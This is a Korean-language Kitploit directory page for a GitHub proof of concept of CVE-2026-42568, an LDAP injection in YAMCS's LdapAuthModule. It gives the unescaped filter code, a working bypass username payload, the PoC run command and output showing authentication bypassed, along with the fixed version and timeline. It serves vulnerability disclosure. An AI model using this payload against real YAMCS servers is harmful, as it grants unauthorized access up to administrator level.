Skip to content
KitploitKITPLOIT
도구블로그
제출
도구블로그
제출

해킹, 침투 테스트 및 사이버 보안 도구를 당신의 보안 무기고에!

Kitploit은 해킹, 사이버 보안 및 침투 테스트 도구 디렉토리입니다. 최신 프로젝트 업데이트를 발견하여 취약점을 찾고, 시스템을 분석하고, 테스트를 자동화하고, 보안을 강화하세요.

··피드·문의·개인정보·© 2026 Kitploit

도구 디렉토리

카테고리

모든 카테고리 보기
Loading categories
CVE-2026-42568 — org.yamcs.security.LdapAuthModule에 LDAP 인젝션 취약점이 존재합니다. 사용자 이름 매개변수가 RFC 4515 이스케이프 없이 LDAP 검색 필터에 직접 삽입되어 인증 우회가 가능합니다. | Kitploit
도구/GitHubGitHub/ex-cal1bur/cve-2026-42568
Vulnerability AnalysisExploitationWeb Application ExploitationPenetration TestingAuthenticationLearning & Education
GitHubex-cal1bur/cve-2026-42568

CVE-2026-42568

org.yamcs.security.LdapAuthModule에 LDAP 인젝션 취약점이 존재합니다. 사용자 이름 매개변수가 RFC 4515 이스케이프 없이 LDAP 검색 필터에 직접 삽입되어 인증 우회가 가능합니다.

저장소 보기
13개월 전아직 검토되지 않음

인기

모두 보기 →

커뮤니티에서 가장 많이 사용되는 도구를 찾아보세요.

모든 도구 탐색

도구 컬렉션을 둘러보세요

모든 도구 보기 →
공유

CVE-2026-42568 — YAMCS LdapAuthModule의 LDAP 인젝션

요약

org.yamcs.security.LdapAuthModule에 LDAP 인젝션 취약점이 존재합니다. 사용자 이름 매개변수가 RFC 4515 이스케이프 처리 없이 LDAP 검색 필터에 직접 삽입되어 인증 우회가 가능합니다.

필드값
CVECVE-2026-42568
심각도MEDIUM
CWECWE-90: LDAP 쿼리에서 특수 요소의 부적절한 중립화
영향받는 버전yamcs-core < 5.12.7 (LDAP 인증이 구성된 경우)
수정 버전yamcs-core 5.12.7
권고GHSA-cqh3-jg8p-336j

취약점 세부 정보

근본 원인 (LdapAuthModule.java):

root@kitploit:~
var filter = userFilter.replace("{0}", username);
// username inserted directly — no RFC 4515 escaping

일반적인 userFilter가 (uid={0})인 경우, 악의적인 사용자 이름이 필터 구조를 깨뜨립니다:

root@kitploit:~
Input:  *)(uid=*))(|(uid=*
Filter: (uid=*)(uid=*))(|(uid=*)
Result: Universal match — authentication bypassed

개념 증명

root@kitploit:~
pip install requests
python3 poc.py http://localhost:8090

취약한 인스턴스에서의 예상 출력 (LDAP 구성 시):

root@kitploit:~
[1] Universal bypass (any account)
     Username: *)(uid=*))(|(uid=*
     Password: anything
     Result:   HTTP 200
     [!!!] AUTHENTICATION BYPASSED
     [!!!] Token received: eyJhbGciOiJSUzI1NiJ9...

참고: 이 취약점은 LdapAuthModule이 구성된 YAMCS 인스턴스에만 영향을 미칩니다. 기본 제공 인증을 사용하는 기본 설치는 영향을 받지 않습니다.

영향

인증되지 않은 공격자가 YAMCS 서버에 접근할 수 있는 경우, LDAP 인증이 구성되어 있으면 인증을 완전히 우회하여 관리자를 포함한 임의의 사용자로 접근할 수 있습니다.

수정

yamcs-core >= 5.12.7로 업그레이드하십시오.

수정 사항은 LDAP 필터를 구성하기 전에 사용자 이름에 RFC 4515 이스케이프를 적용합니다.

일정

날짜사건
2026-05취약점 보고
2026-05-26yamcs-core 5.12.7에서 수정 릴리스
2026-05-26공개 권고 게시

연구자

Daniel Miranda Barcelona (Excal1bur)

  • 깃허브: https://github.com/ex-cal1bur
  • 링크드인: https://linkedin.com/in/daniel-miranda-barcelona
  • 블로그: https://thedumpster.es
도구 다운로드